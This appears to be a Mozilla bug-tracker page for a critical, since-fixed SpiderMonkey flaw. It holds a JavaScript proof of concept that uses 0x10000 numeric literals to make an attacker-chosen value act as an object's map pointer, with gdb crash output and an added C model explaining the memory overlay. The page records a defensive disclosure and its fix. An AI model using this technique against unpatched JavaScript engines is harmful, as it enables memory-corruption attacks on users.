LITOPX DEFFUN is exploitable

Status: VERIFIED FIXED

Product: Core
Component: JavaScript Engine
Priority: --
Severity: critical
Reported: 11 years ago
Last modified: 10 years ago

People

Reporter: shutdown
Assignee: shutdown

Tracking

Keywords: crash, verified1.8.0.10, verified1.8.1.2
Version: Trunk
Points: ---
Bug Flags: blocking1.8.1.2 +, blocking1.8.0.10 +, in-testsuite +
Firefox Tracking Flags: (Not tracked)

Details

Whiteboard: [sg:critical] security tracker for bug 363988

Attachments: 1 attachment

Description (Assignee)

11 years ago
$ cat litopx-deffun-x.txt
function exploit() {
  var code = "";
  // 0x10000 distinct numeric literals: enough atoms to push the atom
  // index past 16 bits, so the emitter must use the LITOPX prefix.
  for(var i = 0; i < 0x10000; i++) {
    if(i == 125) {
      // Literal #125 is 2^52 + 0x50505050: its low 32 bits are the
      // attacker-chosen word 0x50505050.
      code += "void 0x10000050505050;\n";
    } else {
      // 2^52 + i: every other literal is a distinct double.
      code += "void " + (0x10000000000000 + i) + ";\n";
    }
  }
  // The function definition is emitted as DEFFUN under the LITOPX prefix.
  code += "function foo() {}\n";
  eval(code);
}
exploit();

$ gdb --eval run --args dbg.obj/js litopx-deffun-x.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x00432d3d in JS_GetPrivate (cx=0xb50750, obj=0x131c620) at jsapi.c:2298
2298        JS_ASSERT(OBJ_GET_CLASS(cx, obj)->flags & JSCLASS_HAS_PRIVATE);
(gdb) print *obj
$1 = {map = 0x50505050, fslots = {1127219200, 126, 1127219200, 127,
    1127219200, 128}, dslots = 0x43300000}

In other words, bug 363988 is exploitable.
Flags: blocking1.8.1.2+
Flags: blocking1.8.0.10+
Whiteboard: [sg:critical] security tracker for bug 363988
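Why the gdb dump looks the way it does, as an added C model (not code from the bug report or from SpiderMonkey): the PoC's literals are 2^52 + i, and a double in [2^52, 2^53) has exponent 0x433 and a unit-in-the-last-place of exactly 1, so its bit pattern is high word 0x43300000, low word i. If a pointer to such a jsdouble is treated as a JSObject *, the low word becomes `map` and the jsdoubles stored after it supply the slots. The code below assumes the reporter's 32-bit little-endian x86 build, that consecutive literals occupy consecutive 8-byte jsdouble cells, and a header shape of map, six fixed slots, dslots as gdb printed it; `fake_jsobject32`, `poc_literals` and `overlay_object` are names chosen for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NDOUBLES 4        /* literals #125 .. #128 from the PoC */
#define NFSLOTS  6        /* six fixed slots, as in the gdb dump */

/* Assumed 32-bit object header shape modelled on the gdb output
 * (map, six fslots, dslots).  Not SpiderMonkey's own definition. */
typedef struct {
    uint32_t map;
    uint32_t fslots[NFSLOTS];
    uint32_t dslots;
} fake_jsobject32;

/* Low and high 32-bit halves of an IEEE-754 double's bit pattern. */
uint32_t double_low_word(double d) {
    uint64_t bits;
    memcpy(&bits, &d, sizeof bits);
    return (uint32_t)(bits & 0xffffffffu);
}

uint32_t double_high_word(double d) {
    uint64_t bits;
    memcpy(&bits, &d, sizeof bits);
    return (uint32_t)(bits >> 32);
}

/* The four jsdoubles the PoC emits starting at literal #125:
 * 2^52 + 0x50505050 ("void 0x10000050505050;"), then 2^52 + 126, 127, 128.
 * All are below 2^53, so every value is exactly representable. */
void poc_literals(double out[NDOUBLES]) {
    const double two52 = (double)0x10000000000000ULL;   /* 2^52 */
    out[0] = two52 + (double)0x50505050u;
    out[1] = two52 + 126.0;
    out[2] = two52 + 127.0;
    out[3] = two52 + 128.0;
}

/* Lay the doubles out back to back as little-endian 32-bit words (the
 * assumed in-memory image of consecutive jsdouble cells on x86), then
 * read that image as an object header, the way JS_GetPrivate did when
 * handed the wrong pointer. */
fake_jsobject32 overlay_object(const double cells[NDOUBLES]) {
    uint32_t mem[NDOUBLES * 2];
    for (int k = 0; k < NDOUBLES; k++) {
        mem[2 * k]     = double_low_word(cells[k]);   /* low word first */
        mem[2 * k + 1] = double_high_word(cells[k]);
    }
    fake_jsobject32 o;
    o.map = mem[0];
    for (int j = 0; j < NFSLOTS; j++)
        o.fslots[j] = mem[1 + j];
    o.dslots = mem[1 + NFSLOTS];
    return o;
}

/* Compare the model against the values gdb printed for *obj:
 * map = 0x50505050, fslots = {1127219200, 126, 1127219200, 127,
 * 1127219200, 128}, dslots = 0x43300000.  Returns 1 on a full match. */
int overlay_matches_gdb_dump(void) {
    static const uint32_t expect_fslots[NFSLOTS] =
        {1127219200u, 126u, 1127219200u, 127u, 1127219200u, 128u};
    double cells[NDOUBLES];
    poc_literals(cells);
    fake_jsobject32 o = overlay_object(cells);
    if (o.map != 0x50505050u || o.dslots != 0x43300000u)
        return 0;
    for (int j = 0; j < NFSLOTS; j++)
        if (o.fslots[j] != expect_fslots[j])
            return 0;
    return 1;
}

int main(void) {
    double cells[NDOUBLES];
    poc_literals(cells);
    fake_jsobject32 o = overlay_object(cells);
    printf("map = 0x%08x\nfslots = {", o.map);
    for (int j = 0; j < NFSLOTS; j++)
        printf("%s%u", j ? ", " : "", o.fslots[j]);
    printf("}\ndslots = 0x%08x\nmatches gdb dump: %d\n",
           o.dslots, overlay_matches_gdb_dump());
    return 0;
}
```

The point for a reader of the crash: `map` is fully attacker-controlled (the low word of literal #125), and 1127219200 decimal is just 0x43300000, the shared high word of every 2^52 + i literal, which is why it repeats through the slots. Whichever interpreter path confused the numeric atom with an object atom, the dump itself is consistent with obj pointing straight into the jsdouble run.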
shutdown contributed a patch for bug 363988
Assignee: general → shutdown
Fix landed for bug 363988.

/be
Status: NEW → RESOLVED
Last Resolved: 11 years ago
Resolution: --- → FIXED
Keywords: verified1.8.0.10, verified1.8.1.2

Comment 3

10 years ago
Created attachment 251755 [details]
js1_5/Function/regress-364023.js

Updated

10 years ago
Flags: in-testsuite+

Comment 4

10 years ago
verified fixed 1.8.0, 1.8.1, 1.9.0 2007-01-23 win/mac*/linux
Status: RESOLVED → VERIFIED
Group: security

Comment 5

10 years ago
/cvsroot/mozilla/js/tests/js1_5/Function/regress-364023.js,v  <--  regress-364023.js
initial revision: 1.1